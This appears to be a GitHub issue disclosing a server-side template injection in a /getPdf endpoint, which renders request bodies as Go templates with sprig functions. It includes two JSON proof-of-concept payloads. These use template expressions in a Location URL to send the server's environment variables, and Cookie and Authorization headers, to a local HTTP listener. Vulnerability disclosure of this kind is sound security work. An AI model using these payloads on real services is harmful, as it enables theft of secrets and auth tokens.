You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The /getPdf endpoint takes the body of the post request and uses it as a text/template with the functions provided by sprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.
The
/getPdfendpoint takes the body of the post request and uses it as atext/templatewith the functions provided bysprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.input.json:
{ "options": { "print_media_type": true }, "pages": [ { "Location": "http://localhost:8000?{{env .UserAgent}}" } ] }Log from
python -m http.serverOr if this is running as a microservice you could steal the request headers that may have been added for S2S auth:
{ "options": { "print_media_type": true }, "pages": [ { "Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}" } ] }The text was updated successfully, but these errors were encountered: